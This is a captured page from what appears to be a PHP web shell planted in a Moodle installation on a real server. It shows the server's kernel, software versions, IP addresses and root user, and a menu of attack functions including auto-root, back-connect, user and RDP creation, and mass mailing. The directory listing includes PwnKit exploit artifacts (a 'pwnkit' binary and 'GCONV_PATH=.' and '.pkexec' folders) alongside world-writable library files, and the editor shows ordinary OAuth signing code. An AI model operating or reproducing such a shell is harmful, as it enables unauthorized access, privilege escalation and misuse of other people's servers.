Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
ltiprovider /
src /
OAuth /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
OAuthConsumer.php
545
B
-rwxrwxrwx
OAuthDataStore.php
910
B
-rwxrwxrwx
OAuthException.php
259
B
-rwxrwxrwx
OAuthRequest.php
8.5
KB
-rwxrwxrwx
OAuthServer.php
6.7
KB
-rwxrwxrwx
OAuthSignatureMethod.php
1.75
KB
-rwxrwxrwx
OAuthSignatureMethod_HMAC_SHA1...
1.18
KB
-rwxrwxrwx
OAuthSignatureMethod_HMAC_SHA2...
1.25
KB
-rwxrwxrwx
OAuthToken.php
931
B
-rwxrwxrwx
OAuthUtil.php
6.08
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : OAuthSignatureMethod_HMAC_SHA1.php
<?php namespace IMSGlobal\LTI\OAuth; /** * Class to represent an %OAuth HMAC_SHA1 signature method * * @copyright Andy Smith * @version 2008-08-04 * @license https://opensource.org/licenses/MIT The MIT License */ /** * The HMAC-SHA1 signature method uses the HMAC-SHA1 signature algorithm as defined in [RFC2104] * where the Signature Base String is the text and the key is the concatenated values (each first * encoded per Parameter Encoding) of the Consumer Secret and Token Secret, separated by an '&' * character (ASCII code 38) even if empty. * - Chapter 9.2 ("HMAC-SHA1") */ class OAuthSignatureMethod_HMAC_SHA1 extends OAuthSignatureMethod { function get_name() { return "HMAC-SHA1"; } public function build_signature($request, $consumer, $token) { $base_string = $request->get_signature_base_string(); $request->base_string = $base_string; $key_parts = array( $consumer->secret, ($token) ? $token->secret : "" ); $key_parts = OAuthUtil::urlencode_rfc3986($key_parts); $key = implode('&', $key_parts); return base64_encode(hash_hmac('sha1', $base_string, $key, true)); } }
Close